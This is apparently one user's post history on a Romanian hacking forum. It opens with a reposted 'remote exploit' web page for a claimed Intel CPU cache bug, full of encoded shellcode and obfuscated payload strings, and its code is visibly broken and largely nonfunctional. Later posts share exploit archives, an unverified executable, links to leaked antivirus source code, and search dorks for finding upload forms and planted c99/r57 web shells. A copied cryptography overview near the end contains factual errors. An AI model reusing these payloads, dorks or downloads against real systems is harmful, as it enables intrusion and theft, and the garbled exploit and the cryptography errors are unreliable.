-
Posts
233 -
Joined
-
Last visited
-
Days Won
14
Posts posted by ionut97
-
-
-
<!--
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm S4(uR4 member from r00tw0rm team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
'''
#
# Name : Intel Core2Duo cpu cache controller bug PoC
# Date : july, 14 2012
# Author : S4(uR4
# Platform : all
# Type : remote exploit
# Web : www.r00tw0rm.com
# Email : satsura@r00tw0rm.com
# Credit and special thanx : Selena, nezumi
# Tested on : Intel Core 2 Duo T5750, Intel Atom N270
# Special thanks to : r0073r, r4dc0re, Sid3^effects, L0rd CrusAd3r, KedAns-Dz, Angel Injection, gunslinger, JF, CrosS (1337day.com)
# Xenu, Versus71, alsa7r, mich4th3c0wb0y, FInnH@X, th3breacher, s3rver.exe (r00tw0rm.com)
-->
<html>
<head>
<title> CPU cache controller bug exploit (Remote code exec mod poc)</title>
</head>
</html>
<body>
<script type="text/javascript">
var microcode = 257;
var N_CORE = 4;
var XXL = 9*1024*1024;
var buf = 9437185;
var p = {};
var bug;
var result;
var n = {};
function init_c(){};
function engine(p, n){};
function test(result){
// debug: testing micro-program for the old vm, does not work now
// latter comment 1: oh. my! it works! wow!
// latter comment 2: it works, but it does not what it's expected to
// dw buf[]={1,-3,0, -6,9,1, 13,-67,2, -69,96,3, 1,-1,4,
// -3,3,5, 16,-27,6, -66,99,7, 55,-1,8, -1,-3,9, 0,-67,10};
// the infinite loop will be patched on the fly because of the Intel CPU bug
// addr of the test() func should be aligned by 4Kb boundary,
// 1st dword will be changed to NOP, NOP, NOP, NOP
// it's possible to change the kernel memory as well,
// two things:
// 1) alignment;
// 2) the code is currently executed;
//
// engine() obtains the address of test(), but does not check it,
// so if you replace it, you have to check the conditionals above by yourself.
// also the content to overwrite. if you want to change data memory
// it's supposed to be in the cache as well.
/*
ASM:
.text
.globl main
.type main, @function
L1:
xorl %ecx, %ecx
main:
pushl %ebp
movl %esp, %ebp
popl %ebp
loop L1
ret
.size main, .-main
DISASM:
080483b4 <L1>:
80483b4: 31 c9 xor %ecx,%ecx
080483b6 <main>:
80483b6: 55 push %ebp
80483b7: 89 e5 mov %esp,%ebp
80483b9: 5d pop %ebp
80483ba: e2 f8 loop 80483b4 <L1>
80483bc: c3 ret
80483bd: 90 nop
80483be: 90 nop
80483bf: 90 nop
*/
unescape('%u31C9%u5589%uE55D%u2EF8%uC390%u9090');
return 0;
}
function ThreadProc(lpParameter){
engine(buf, microcode*3);
return(0);
}
function ThreadProc_dbg(bug){
var result = 1;
test(result);
if (result != 1){
document.write("<h1>[+] your CPU is buggy!<h1>");
}
else{
document.write("<h1>[-] your CPU isn't buggy!<h1>");
//eueeuereturn(0);
}
}
function microcode_vm(){
var evilcode = "6B70%u6E63%u2066%u6F72%u204A%u442E%u2066%u6F72%u2049%u6E74"+
"%u656C%u2043%u6F72%u6520%u3220%u4475%u6F20%u5435%u3735%u300D%u0A28%u6329"+
"%u2053%u656C%u656E%u612F%u2F32%u3030%u372C%u2032%u3030%u3800%u2B00%u0000"+
"%u0500%u0000%u2600%u0000%u3E00%u0000%u4702%u0000%uE7FD%uFFFF%u0000%u0000"+
"%uA3FF%uFFFF%uA7FF%uFFFF%u0100%u0000%u0200%u0000%u0A00%u0000%u0200%u0000"+
"%u0100%u0000%u0900%u0000%u0300%u0000%u0400%u0000%u1400%u0000%u0400%u0000"+
"%u1F00%u0000%u2B00%u0000%u0500%u0000%u2600%u0000%u3E00%u0000%u0600%u0000"+
"%u0D00%u0000%u2500%u0000%u0700%u0000%u3000%u0000%u4000%u0000%u0800%u0000"+
"%u6B00%u0000%u8F00%u0000%u0900%u0000%uFA00%u0000%u1201%u0000%u0A00%u0000"+
"%uC901%u0000%uE101%u0000%u0B00%u0000%u0C00%u0000%u3C00%u0000%u0C00%u0000"+
"%u1700%u0000%u3300%u0000%u0D00%u0000%u0E00%u0000%u3600%u0000%u0E00%u0000"+
"%u1500%u0000%u4D00%u0000%u0F00%u0000%u6800%u0000%u8800%u0000%u1000%u0000"+
"%uD300%u0000%u1701%u0000%u1100%u0000%uF201%u0000%u3A02%u0000%u1200%u0000"+
"%uF103%u0000%u3904%u0000%u1300%u0000%uF407%u0000%u2408%u0000%u1400%u0000"+
"%uEF0F%u0000%u3B10%u0000%u1500%u0000%u961F%u0000%uCE1F%u0000%u1600%u0000"+
"%u1D00%u0000%u7500%u0000%u1700%u0000%u2000%u0000%u7000%u0000%u1800%u0000"+
"%u1B00%u0000%u7F00%u0000%u1900%u0000%u2A00%u0000%u6200%u0000%u1A00%u0000"+
"%u1900%u0000%u7100%u0000%u1B00%u0000%u3C00%u0000%u8C00%u0000%u1C00%u0000"+
"%uE700%u0000%u2301%u0000%u1D00%u0000%u9E01%u0000%uE601%u0000%u1E00%u0000"+
"%u2500%u0000%u9D00%u0000%u1F00%u0000%uD800%u0000%u1801%u0000%u2000%u0000"+
"%uA301%u0000%u2702%u0000%u2100%u0000%uE203%u0000%u6A04%u0000%u2200%u0000"+
"%uE107%u0000%u6908%u0000%u2300%u0000%uE40F%u0000%u7410%u0000%u2400%u0000"+
"%uFF1F%u0000%u4B20%u0000%u2500%u0000%uC63F%u0000%u1E40%u0000%u2600%u0000"+
"%uAD7F%u0000%u0580%u0000%u2700%u0000%uD0FF%u0000%u6000%u0100%u2800%u0000"+
"%uCBFF%u0100%u6F00%u0200%u2900%u0000%uDAFF%u0300%u7200%u0400%u2A00%u0000"+
"%u29FF%u0700%u81FF%u0700%u2B00%u0000%u2C00%u0000%u9C00%u0000%u2C00%u0000"+
"%u3700%u0000%u9300%u0000%u2D00%u0000%u2E00%u0000%u9600%u0000%u2E00%u0000"+
"%u3500%u0000%uED00%u0000%u2F00%u0000%u4800%u0000%uE800%u0000%u3000%u0000"+
"%u3300%u0000%uF700%u0000%u3100%u0000%u5200%u0000%uDA00%u0000%u3200%u0000"+
"%u1100%u0000%u9900%u0000%u3300%u0000%u1400%u0000%u8400%u0000%u3400%u0000"+
"%u0F00%u0000%u9B00%u0000%u3500%u0000%u3600%u0000%uEE00%u0000%u3600%u0000"+
"%u7D00%u0000%u1501%u0000%u3700%u0000%uC001%u0000%u5002%u0000%u3800%u0000"+
"%u3B03%u0000%uDF03%u0000%u3900%u0000%u4A00%u0000%uC200%u0000%u3A00%u0000"+
"%u3900%u0000%uD100%u0000%u3B00%u0000%u5C00%u0000%u2C01%u0000%u3C00%u0000"+
"%uC701%u0000%u4302%u0000%u3D00%u0000%u3E03%u0000%uC603%u0000%u3E00%u0000"+
"%u4500%u0000%u3D01%u0000%u3F00%u0000%uB801%u0000%u3802%u0000%u4000%u0000"+
"%u4303%u0000%u4704%u0000%u4100%u0000%uC207%u0000%uCA08%u0000%u4200%u0000"+
"%uC10F%u0000%uC910%u0000%u4300%u0000%uC41F%u0000%uD420%u0000%u4400%u0000"+
"%uDF3F%u0000%uEB40%u0000%u4500%u0000%uE67F%u0000%uFE80%u0000%u4600%u0000"+
"%uCDFF%u0000%uE500%u0100%u4700%u0000%uF0FF%u0100%u8000%u0200%u4800%u0000"+
"%uABFF%u0300%uCF00%u0400%u4900%u0000%uBAFF%u0700%uD200%u0800%u4A00%u0000"+
"%u89FF%u0F00%u2100%u1000%u4B00%u0000%u4CFF%u1F00%u7C00%u2000%u4C00%u0000"+
"%uD7FF%u3F00%uF300%u4000%u4D00%u0000%uCEFF%u7F00%uF600%u8000%u4E00%u0000"+
"%uD5FF%uFF00%u8D00%u0001%u4F00%u0000%uA8FF%uFF01%uC800%u0002%u5000%u0000"+
"%u93FF%uFF03%uD700%u0004%u5100%u0000%uB2FF%uFF07%uFA00%u0008%u5200%u0000"+
"%uB1FF%uFF0F%uF900%u0010%u5300%u0000%uB4FF%uFF1F%uE400%u0020%u5400%u0000"+
"%uAFFF%uFF3F%uFB00%u0040%u5500%u0000%u56FE%uFF7F%u0EFF%uFF7F%u5600%u0000"+
"%u5D00%u0000%u3501%u0000%u5700%u0000%u6000%u0000%u3001%u0000%u5800%u0000"+
"%u5B00%u0000%u3F01%u0000%u5900%u0000%u6A00%u0000%u2201%u0000%u5A00%u0000"+
"%u5900%u0000%u3101%u0000%u5B00%u0000%u7C00%u0000%uCC01%u0000%u5C00%u0000"+
"%uA700%u0000%uE301%u0000%u5D00%u0000%u5E00%u0000%u2601%u0000%u5E00%u0000"+
"%u6500%u0000%uDD01%u0000%u5F00%u0000%u9800%u0000%uD801%u0000%u6000%u0000"+
"%u6300%u0000%uE701%u0000%u6100%u0000%uA200%u0000%uAA01%u0000%u6200%u0000"+
"%u2100%u0000%u2901%u0000%u6300%u0000%u2400%u0000%u3401%u0000%u6400%u0000"+
"%u3F00%u0000%u0B01%u0000%u6500%u0000%u0600%u0000%u5E01%u0000%u6600%u0000"+
"%u6D00%u0000%uC501%u0000%u6700%u0000%u9000%u0000%uA001%u0000%u6800%u0000"+
"%u0B00%u0000%u2F01%u0000%u6900%u0000%u1A00%u0000%u3201%u0000%u6A00%u0000"+
"%u6900%u0000%uC101%u0000%u6B00%u0000%uEC00%u0000%u5C02%u0000%u6C00%u0000"+
"%uF703%u0000%u5305%u0000%u6D00%u0000%uEE07%u0000%u5609%u0000%u6E00%u0000"+
"%uF50F%u0000%u2D11%u0000%u6F00%u0000%u881F%u0000%uA820%u0000%u7000%u0000"+
"%u733E%u0000%uB73F%u0000%u7100%u0000%u9200%u0000%u9A01%u0000%u7200%u0000"+
"%u5100%u0000%uD901%u0000%u7300%u0000%uD400%u0000%u4402%u0000%u7400%u0000"+
"%uCF03%u0000%u5B05%u0000%u7500%u0000%uF607%u0000%u2E09%u0000%u7600%u0000"+
"%uBD0F%u0000%u5511%u0000%u7700%u0000%u801F%u0000%u9020%u0000%u7800%u0000"+
"%u7B3E%u0000%u9F3F%u0000%u7900%u0000%u8A00%u0000%u8201%u0000%u7A00%u0000"+
"%u7900%u0000%u9101%u0000%u7B00%u0000%u9C00%u0000%u6C02%u0000%u7C00%u0000"+
"%u8703%u0000%u8304%u0000%u7D00%u0000%u7E06%u0000%u8607%u0000%u7E00%u0000"+
"%u8500%u0000%u7D02%u0000%u7F00%u0000%u7803%u0000%u7804%u0000%u8000%u0000"+
"%u8306%u0000%u8708%u0000%u8100%u0000%u820F%u0000%u8A11%u0000%u8200%u0000"+
"%u811F%u0000%u8921%u0000%u8300%u0000%u843F%u0000%u9441%u0000%u8400%u0000"+
"%u9F7F%u0000%uAB81%u0000%u8500%u0000%uA6FF%u0000%uBE01%u0100%u8600%u0000"+
"%u8DFF%u0100%uA501%u0200%u8700%u0000%uB0FF%u0300%uC001%u0400%u8800%u0000"+
"%uEBFF%u0700%u0F01%u0800%u8900%u0000%u7AFF%u0F00%u9201%u1000%u8A00%u0000"+
"%u49FF%u1F00%u6100%u2000%u8B00%u0000%u8CFE%u3F00%uBC00%u4000%u8C00%u0000"+
"%u97FF%u7F00%uB301%u8000%u8D00%u0000%u8EFF%uFF00%uB601%u0001%u8E00%u0000"+
"%u95FF%uFF01%uCD01%u0002%u8F00%u0000%uE8FF%uFF03%u0801%u0004%u9000%u0000"+
"%u53FF%uFF07%u9701%u0008%u9100%u0000%u72FF%uFF0F%uBA01%u0010%u9200%u0000"+
"%u71FF%uFF1F%uB901%u0020%u9300%u0000%u74FF%uFF3F%uA401%u0040%u9400%u0000"+
"%u6FFF%uFF7F%uBB01%u0080%u9500%u0000%u16FF%uFFFF%u4E00%u0000%u9600%u0000"+
"%u9DFE%uFFFF%uF500%u0000%u9700%u0000%uA0FF%uFFFF%uF001%u0000%u9800%u0000"+
"%u9BFF%uFFFF%uFF01%u0000%u9900%u0000%uAAFF%uFFFF%uE201%u0000%u9A00%u0000"+
"%u99FF%uFFFF%uF101%u0000%u9B00%u0000%uBCFF%uFFFF%u0C01%u0000%u9C00%u0000"+
"%u67FF%uFFFF%uA301%u0000%u9D00%u0000%u1EFF%uFFFF%u6600%u0000%u9E00%u0000"+
"%uA5FE%uFFFF%u1D00%u0000%u9F00%u0000%u58FF%uFFFF%u9801%u0000%uA000%u0000"+
"%u23FF%uFFFF%uA701%u0000%uA100%u0000%u62FF%uFFFF%uEA01%u0000%uA200%u0000"+
"%u61FF%uFFFF%uE901%u0000%uA300%u0000%u64FF%uFFFF%uF401%u0000%uA400%u0000"+
"%u7FFF%uFFFF%uCB01%u0000%uA500%u0000%u46FF%uFFFF%u9E01%u0000%uA600%u0000"+
"%u2DFF%uFFFF%u8501%u0000%uA700%u0000%u50FF%uFFFF%uE001%u0000%uA800%u0000"+
"%u4BFF%uFFFF%uEF01%u0000%uA900%u0000%u5AFF%uFFFF%uF201%u0000%uAA00%u0000"+
"%uA9FC%uFFFF%u01FE%uFFFF%uAB00%u0000%uAC00%u0000%u1C02%u0000%uAC00%u0000"+
"%uB700%u0000%u1302%u0000%uAD00%u0000%uAE00%u0000%u1602%u0000%uAE00%u0000"+
"%uB500%u0000%u6D02%u0000%uAF00%u0000%uC800%u0000%u6802%u0000%uB000%u0000"+
"%uB300%u0000%u7702%u0000%uB100%u0000%uD200%u0000%u5A02%u0000%uB200%u0000"+
"%u9100%u0000%u1902%u0000%uB300%u0000%u9400%u0000%u0402%u0000%uB400%u0000"+
"%u8F00%u0000%u1B02%u0000%uB500%u0000%uB600%u0000%u6E02%u0000%uB600%u0000"+
"%uFD00%u0000%u9503%u0000%uB700%u0000%u4001%u0000%uD003%u0000%uB800%u0000"+
"%uBB00%u0000%u5F02%u0000%uB900%u0000%uCA00%u0000%u4202%u0000%uBA00%u0000"+
"%uB900%u0000%u5102%u0000%uBB00%u0000%uDC00%u0000%uAC03%u0000%uBC00%u0000"+
"%u4701%u0000%uC303%u0000%uBD00%u0000%uBE00%u0000%u4602%u0000%uBE00%u0000"+
"%uC500%u0000%uBD03%u0000%uBF00%u0000%u3801%u0000%uB803%u0000%uC000%u0000"+
"%uC300%u0000%uC703%u0000%uC100%u0000%u4201%u0000%u4A03%u0000%uC200%u0000"+
"%u4100%u0000%u4902%u0000%uC300%u0000%u4400%u0000%u5402%u0000%uC400%u0000"+
"%u5F00%u0000%u6B02%u0000%uC500%u0000%u6600%u0000%u7E02%u0000%uC600%u0000"+
"%u4D00%u0000%u6502%u0000%uC700%u0000%u7000%u0000%u0002%u0000%uC800%u0000"+
"%u2B00%u0000%u4F02%u0000%uC900%u0000%u3A00%u0000%u5202%u0000%uCA00%u0000"+
"%u0900%u0000%uA102%u0000%uCB00%u0000%uCC00%u0000%uFC03%u0000%uCC00%u0000"+
"%u5701%u0000%u7303%u0000%uCD00%u0000%u4E00%u0000%u7602%u0000%uCE00%u0000"+
"%u5500%u0000%u0D02%u0000%uCF00%u0000%u2800%u0000%u4802%u0000%uD000%u0000"+
"%u1300%u0000%u5702%u0000%uD100%u0000%u3200%u0000%u7A02%u0000%uD200%u0000"+
"%u3100%u0000%u7902%u0000%uD300%u0000%u3400%u0000%u6402%u0000%uD400%u0000"+
"%u2F00%u0000%u7B02%u0000%uD500%u0000%uD600%u0000%u8E03%u0000%uD600%u0000"+
"%uDD01%u0000%uB504%u0000%uD700%u0000%uE007%u0000%uB00A%u0000%uD800%u0000"+
"%uDB0F%u0000%uBF12%u0000%uD900%u0000%uEA1F%u0000%uA222%u0000%uDA00%u0000"+
"%uD93F%u0000%uB142%u0000%uDB00%u0000%uFC7F%u0000%u4C82%u0000%uDC00%u0000"+
"%u27FF%u0000%u6301%u0100%uDD00%u0000%uDEFC%u0100%uA6FF%u0100%uDE00%u0000"+
"%uE501%u0000%u5D04%u0000%uDF00%u0000%u1807%u0000%u5809%u0000%uE000%u0000"+
"%uE30C%u0000%u670F%u0000%uE100%u0000%u2201%u0000%u2A03%u0000%uE200%u0000"+
"%uA100%u0000%uA903%u0000%uE300%u0000%uA401%u0000%uB404%u0000%uE400%u0000"+
"%uBF07%u0000%u8B0A%u0000%uE500%u0000%u860F%u0000%uDE12%u0000%uE600%u0000"+
"%uED1F%u0000%u4522%u0000%uE700%u0000%u103F%u0000%u2041%u0000%uE800%u0000"+
"%u8B7C%u0000%uAF7F%u0000%uE900%u0000%u9A01%u0000%uB204%u0000%uEA00%u0000"+
"%uE907%u0000%u410A%u0000%uEB00%u0000%u6C0F%u0000%uDC12%u0000%uEC00%u0000"+
"%u771F%u0000%uD322%u0000%uED00%u0000%u6E3F%u0000%uD642%u0000%uEE00%u0000"+
"%u757F%u0000%uAD82%u0000%uEF00%u0000%u08FF%u0000%u2801%u0100%uF000%u0000"+
"%uF3FC%u0100%u37FF%u0100%uF100%u0000%u1201%u0000%u1A03%u0000%uF200%u0000"+
"%uD100%u0000%u5903%u0000%uF300%u0000%u5401%u0000%uC404%u0000%uF400%u0000"+
"%u4F07%u0000%uDB0A%u0000%uF500%u0000%u760F%u0000%uAE12%u0000%uF600%u0000"+
"%u3D1F%u0000%uD522%u0000%uF700%u0000%u003F%u0000%u1041%u0000%uF800%u0000"+
"%uFB7C%u0000%u1F7F%u0000%uF900%u0000%u0A01%u0000%u0203%u0000%uFA00%u0000"+
"%uF900%u0000%u1103%u0000%uFB00%u0000%u1C01%u0000%uEC04%u0000%uFC00%u0000"+
"%u0707%u0000%u0309%u0000%uFD00%u0000%uFE0C%u0000%u060F%u0000%uFE00%u0000"+
"%u0501%u0000%uFD04%u0000%uFF00%u0000%uF806%u0000%uF808%u0000%u0001%u0000";
unescape(evilcode);
}
/*
// THREATED IMPLEMENTATION
function init(){
document.write("<p>[!] Exploit Running</p><br>");
document.write("[+] Loading micro-program");
microcode_vm();
var a, id, handle;
var size = 111;
document.write("initializing XX thread...");
for (a=1; a < N_CORE; a++){
//code should be written for debug.
}
}
*/
function vm_engine()
{
var a, dw, f1, f2, f3, fn, f0 = -1, dt = 0;
for({
microcode_vm();
f1;
unescape = (p + ((dt++) % n));
f2 = (p + ((dt++) % n));
f3 = (p + ((dt++) % n));
// vm + scrambler + dynamic encoder + multi-pass obfuscator
fn = -1 ^ (f1 ^ f2) + ((dt + f1) ^ f2) ^ f0;
// a few minutes to trigger this condition on 2.4 MHz PC
if ( ((f1 ^ f2) == 0) || (f1 ^ f2 ^ f3) == 0)
{
// a sync problem. it would be better to use locks over here.
// crash happens. crash is not shit. crash means code works.
// so, should be really care about the addr and the content?
// it works for Intel Core 2 Duo T5750. o_o 5 ~ 10 minutes of
// it gives BSOD on Intel Atom N270 cpu o_o less than an hour
f3 = test(result); f1 = unescape("%u9090%u9090") ^ f0 +
// Shellcode Calculator
unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"+
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000"); f2 = test ^ fn;
document.write("<br><br>w00t! w00t! u g0t r00t ?!<br>");
} (p + (f3 % n)) = fn; f0 = fn; /* f0 = fn ^ dt */ ;
}
}
function demo()
{
var n;
document.write("HITB 2008 missing exploit :=) by Selena<br><br>");
document.write("micro-code is written by Selena<br>");
document.write("virtual machine is designed by Selena<br>");
document.write("virtual machine is designed by Selena<br>");
document.write("virtual machine has been rewritten by nezumi<br><br>");
document.write("exploit PoC rewritten by S4(uR4 for remote atack demo 2012<br><br>");
//setTimeout(9000);
document.write("[!]<b> Exploit Running");
vm_engine(); //if (n == 0) { init_t();} ;
//if(result != 0){
document.write("<br><b>[+] Done!");
//}
}
</script>
<h1>CPU cache controller bug exploit Remote code exec mod</h1>
<button onClick="ThreadProc_dbg(bug)";><b>• Check vuln</b> »</button>
<button onClick="demo()";><b>PoC Run!</b> ?</button>
</body>
# 1337day.com [2012-07-13]- 1
-
Examenul CEH v5 si v7.
Link v5: http://www.depotware-network.net/Partage/CEH/examen/cehv5.html
Link v7: http://www.depotware-network.net/Partage/CEH/examen/cehv7.pdf (+ raspunsuri)
Si ca sa nu mai deschid alt topic pun aici si materialele de la CEH v6 :
-
Ceva interesant.
Contine:
[dir] Exploits [dir] 2011-Jun-09
[dir] GSM Hacks [dir] 2011-Jun-03
[dir] Linux [dir] 2011-Jun-24 *Nix!
[dir] Local Root Exploits [dir] 2011-Jun-03
[dir] Misc [dir] 2011-Jun-03 Papers and Videos
[dir] OSX [dir] 2011-Jun-24 Mac
[dir] UNIX [dir] 2011-Jun-24 Novell, etc...
[dir] Virii [dir] 2011-Jun-03
[dir] Win32 [dir] 2011-Jun-24 Win95, 98, NT, 2000, and XP
[dir] Word Lists
Multe videouri,tutoriale,exploituri,tooluri,etc.
-
-
Nu l-am verificat.
L-am luat de pe abh.
-
File: popelle.exe
Tama? or: 90112 bytes
MD5: 1fbcfdb365c38f8573c802684777fe8d
SHA1: d91f4ff1f823c8cf4f9f4fc211102127bcd7280b
Result: 0/35
Status: Clean
AVG Free - OK
ArcaVir - OK
Avast 5 - OK
AntiVir (Avira) - OK
BitDefender - OK
VirusBuster Internet Security - OK
Clam Antivirus - OK
COMODO Internet Security - OK
Dr.Web - OK
eTrust-Vet - OK
F-PROT Antivirus - OK
F-Secure Internet Security - OK
G Data - OK
IKARUS Security - OK
Kaspersky Antivirus - OK
McAfee - OK
MS Security Essentials - OK
ESET NOD32 - OK
Norman - OK
Norton Antivirus - OK
Panda Security - OK
A-Squared - OK
Quick Heal Antivirus - OK
Rising Antivirus - OK
Solo Antivirus - OK
Sophos - OK
Trend Micro Internet Security - OK
VBA32 Antivirus - OK
Vexira Antivirus - OK
Zoner AntiVirus - OK
Ad-Aware - OK
BullGuard - OK
Immunet Antivirus - OK
K7 Ultimate - OK
VIPRE - OK
http://www.mediafire.com/?ng5lzgyzgyy
//Gata am pus alt link
-
Un canal interesant cu peste 500 de video-uri.
-
-
Am gasit de curand un site interesant.
adamas.ai - veritas vos liberabit
Dupa cum am spus contine :
Printre care si :
http://download.adamas.ai/dlbase/Stuff/KASPERSKY_AV_2k8_SOURCECODE_leak.rar
http://download.adamas.ai/dlbase/Stuff/SYMANTEC_pcAnywhere_SOURCE_leak.rar
http://download.adamas.ai/dlbase/Stuff/Norton_AntiVirus_2k6_SOURCE_leak.tar.gz
Nu m-am uitat peste tot.In mare parte este despre malware.
-
-
-
Mutillidae is a free, open source web application provided to allow security enthusiast to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to install or administrate their own webserver. Mutillidae contains dozens of vulnerabilities and hints to help the user exploit them; providing an easy-to-use web hacking environment deliberately designed to be used as a hack-lab for security enthusiast, classroom labs, and vulnerability assessment tool targets.
Change log : Mutillidae 2.1.20:
Changed some color schemes
Bug fix: The html5 key validation on the on the html5 page was too restrictive. The validator was throwing errors even when the input was ok. This validation checks for any non-alphanumeric characters and prints an error if non-alphanumeric characters are found. This error message contains the bad key the user input. Since the site fails to output encode this error message, it is possible to perform DOM injection.
Add the html5-storage.php to the vulnerabilities listing.
-
Incearca:
inurl:uploadimages.asp
inurl:uploadlogo.asp
inurl:uploadpictures.asp
inurl:uploadgallery
inurl:uploadfile.asp
inurl:uploadtest.asp
intitle:Test Free ASP Upload
Sau pentru shelluri deja urcate:
inurl:.php “cURL: ON MySQL: ON MSSQL: OFF”
“Shell” filetype:php intext:”uname -a:” “EDT 2010?
intitle:”intitle:r57shell” [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]
inurl:”c99.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:”c100.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:”Shell” inurl:”.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update
-
Description: In this video , I have demonstrated how to upload shell on a server when .php or .asp extension are not allowed to upload. -
Cryptography is the study and practice of hiding information. There are a few examples of cryptography that are used in business and government to help prevent unwanted disclosure of messages and other types of information. Find out information on the most popular types and how they are used.
Symmetric Cryptography
There are different examples of cryptography
Symmetric cryptography includes methods of encryption that are best suited for processing large streams of data. It is distinguished the use of a single key for encrypting and decrypting messages by the sender and receiver.
This type of cryptography is categorized by the use of stream or block ciphers. Stream ciphers operate by encrypting single bits or bytes of information (or plaintext) at a time and implements a feedback mechanism to constantly change the key. Alternatively, block ciphers encrypts data into individual fixed group of bits (a common size is 128 bits) using the same key.
An advantage of symmetric cryptography is that its methods are inexpensive for creating and processing encrypted data. The disadvantage of this example of cryptography is that is both the sender and receiver of the message have to agree on the key. If the key is discovered, the encrypted information becomes compromised.
The following are popular examples of cryptography that have used symmetric encryption:
International Data Encryption Method (IDEA)
Advanced Encryption Standard (AES)
Data Encryption Standard (DES)
Two Fish is a 128 bit block cipher that uses 128/192/256 bit keys.
Camelia is similar to AES and uses 128 bit block cipher. Used in 32 bit processors and 8 bit processors (smart cards).
Misty 1 – Made by Mitsubishi. It is a 128 bit block cipher and used in computer hardware/software.
Skipjack
Asymmetric Cryptography
Asymmetric cryptography (also called public key cryptography) encryption methods are best used for key exchange and user authentication. This type of cryptography is commonly used in digital signatures. It is distinguished by the use of a private and public key that are created with one-way functions using multiplication and exponentiation. One key is public and published in a public directory while the private key is only known by the receiver of the message.
The following are applications that use asymmetric cryptography:
Transport Layer Standard (TLS), a communications protocol which is replacing Secure Socket Layer (SSL) for transmitting data over the Internet.
RSA is used in electronic commerce protocols, software production, key exchange and digital signatures. It implements a variable size encryption block and key.
PGP (or Pretty Good Privacy) is used for the authentication of data communication and encrypting/decrypting email messages.
GnuPG/GPG – GNU Privacy Guard is a standard that tracks specifications of OpenPGP.
Elliptic Curve Cryptography
Elliptic curve cryptography is a standard method used by NIST, NSI and IEEE for government and financial institution use. It is based on public key encryption and used in mobile and wireless environments.
Public keys are created by utilizing the following algebraic equation -
y^2=x^3 + 3 + Ax + B where the x and y points on a curve are used to calculate a public key. The private key is a random number.
The appeal of elliptic curve cryptography is that it offers security with smaller key sizes which result in faster computations, lower power consumption, memory and bandwidth use.
Quantum Cryptography
Quantum cryptography methods use photons to create encrypted keys that can be sent over optical fiber networks by using beams of light. It uses “qubits”, which is essentially a computer bit in quantum form. Keys are created using a procedure called quantum key distribution (QKD). In this method, photons are transmitted in horizontal and vertical directions with the use of a laser source over a quantum channel.
A unique property of this example of cryptography is its ability to detect the presence of anyone that tries to obtain the quantum key. Any attempt would be noticed by the sender and receiver by a high increase in the transmission error rate. Since photons cannot be copied or divided keys are virtually unbreakable.
Currently, these types of method can only produce and distribute and encrypted keys. However as of 2010, Japan is working on testing new quantum cryptography methods that can be used to secure video conferencing for government communications.
Final Thoughts on Cryptography
While there are many examples of cryptography, security of information is never one hundred percent perfect. Even though more complex encryption methods are always being created, sophisticated hackers can learn to adapt and find a way to crack these systems. We just need to try and be one step ahead of the game.
Sursa:Examples of Cryptography used in Business and Government Applications
- 1
-
COMPUTING
Computer Hardware
Are You a Computer Hardware Expert?
Computer History Quiz
How Much Do You Know About Graphics Cards?
The PC Part Compatibility Quiz
Think You Know Computers? Take Our Quiz and Test Your Knowledge
What Does This Piece Do?
Who's the Most Evil? Test Your Knowledge of Tech Company Transgressions
Computer Security
Quiz: Do You Know Computer Viruses?
How Safe Is Your Wi-Fi Connection?
Quiz: How Secure is Your Computer?
Test Your Computer Security Skills With the Malware Open Challenge
Google
Do You Know Everything About AdSense?
Do You Really Know How to Use Google? Take Our Quiz to Test Your Google Search Basics!
Google AdWords: Quiz Yourself
Google on the Brain: a Quirky Quiz
Linux
Just Started Using Linux? Test Your Knowledge!
Test Your Knowledge of Linux and Open Source Computing History
Reckon You Know Everything There is to Know About Linux?
Mac
Are You Up to Speed in Lion?
